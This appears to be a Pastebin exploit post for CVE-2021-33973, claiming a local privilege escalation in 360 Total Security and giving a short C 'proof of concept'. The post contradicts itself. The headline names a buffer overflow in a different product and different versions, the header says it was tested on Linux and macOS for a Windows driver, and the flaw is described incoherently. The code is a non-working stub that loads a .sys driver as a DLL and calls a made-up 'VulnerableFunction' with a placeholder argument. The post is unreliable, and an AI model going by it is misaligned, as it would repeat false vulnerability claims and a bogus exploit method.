Headline
CVE-2021-33973: CVE-2021-33973 - Pastebin.com
Buffer Overflow vulnerability in Qihoo 360 Safe guard v12.1.0.1004, v12.1.0.1005, v13.1.0.1001 allows attacker to escalate priveleges.
# Exploit Title: 360 Total Security 10.8.0.1213 Local Privilege Escalation
# Google Dork: N/A
# Date: 2021-05-11
# Exploit Author: youtube.com/@memorycorruptor
# Vendor Homepage: http://www.360totalsecurity.com/
# Version: 360 Total Security 10.8.0.1213
# Tested on: Windows x64 / Linux Debian x64 / MacOS
# CVE: CVE-2021-33973
# PoC Video: https://www.youtube.com/@memorycorruptor/videos
# Description: https://memorycorruptor.blogspot.com/p/vulnerabilities-disclosures.html
---------------------------------------------------------------------------
Elevation of Privilege (EOP) Vulnerability in 360 Total Security 10.8.0.1213
- A Local Privilege Escalation vulnerability in 360 Total Security 10.8.0.1213, which allows the antivirus software to execute actions with system-level privileges while running under standard user privileges, The vulnerability is similar to a Windows kernel vulnerability discovered in 2021.
Introduction
360 Total Security 10.8.0.1213 is an antivirus software that provides protection against various threats. A recently discovered LPE/EOP vulnerability in the software allows it to perform actions with system-level privileges while running under standard user privileges. This article analyzes this vulnerability and provides a PoC to demonstrate the exploit.
Vulnerability
The LPE/EOP vulnerability in 360 Total Security 10.8.0.1213 is similar to a Windows kernel vulnerability discovered in 2021. It allows the antivirus software to perform actions with system-level privileges, bypassing the usual security checks in Windows. This can lead to unauthorized access, data theft, or other malicious actions.
- Proof of Concept
#include <Windows.h>
#include <stdio.h>
int main() {
// Load the vulnerable driver
HMODULE hDriver = LoadLibrary(“360TotalSecurity.sys”);
if (!hDriver) {
printf("Failed to load driver: %d\n", GetLastError());
return 1;
}
// Get address
FARPROC pVulnFunc = GetProcAddress(hDriver, “VulnerableFunction”);
if (!pVulnFunc) {
printf("Failed to get function address: %d\n", GetLastError());
FreeLibrary(hDriver);
return 1;
}
- // Exploit code
- pVulnFunc(/* Crafted argument */);
FreeLibrary(hDriver);
return 0;
}
the vulnerable driver (360TotalSecurity.sys) and retrieves the address of the vulnerable function. The exploit code should be placed where indicated, and the vulnerable function should be called with a crafted argument to trigger the LPE/EOP vulnerability.
---------------------------------------------------------------------------